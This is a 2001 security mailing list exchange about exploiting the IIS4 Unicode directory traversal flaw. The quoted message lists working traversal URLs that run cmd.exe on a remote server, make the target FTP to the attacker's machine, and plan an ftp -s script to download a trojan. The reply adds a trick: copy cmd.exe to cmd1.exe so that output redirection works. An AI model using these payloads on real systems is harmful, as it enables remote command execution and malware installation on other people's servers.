you must first to another copy cmd.exe to another name such as cmd1.exe, if
you use cmd.exe it will not allow piping but simply rename it and u got a
winner.
http://www.securityfocus.com/templates/archive.pike?threads=0&end=2000-10-29
&mid=141284&start=2000-10-23&list=1&fromthread=0&
give you an example
----- Original Message -----
From: "Mad Zigy" <zigy_at_GLOBAL.CO.ZA
To: <VULN-DEV_at_SECURITYFOCUS.COM>
Sent: Saturday, January 06, 2001 7:59 AM
Subject: unicode / iis4
> Well i have been able to use msadc2.pl yet the
> commands i give do not work. so i tried the other way
> by doing
> http://hostname/scripts/..%c0%
> af../winnt/system32/cmd.exe?/c+echo+test+>+c:\test
> .txt
> and all it did was say: The parameter is incorrect.
> so then i though maybe we cant have a > in the string
> so i found the hex of it and tried
> http://hostname/scripts/..%c0%
> af../winnt/system32/cmd.exe?/c+echo+test+%
> 3e+c:\test.txt
> yet it still gave me the same: The parameter is
> incorrect.
> I have been able to make it ftp into my pc by
> http://hostname/scripts/..%c0%
> af../winnt/system32/cmd.exe?/c+ftp+hostname
> but i cant make it login as i need to echo a script
> which i can run http://hostname/scripts/..%c0%
> af../winnt/system32/cmd.exe?/c+ftp+-
> s:c:\ftp.txt+hostname so that it will login and
> download the exe / trojan
> Thankz zigy!
>
Received on Jan 08 2001
Intro
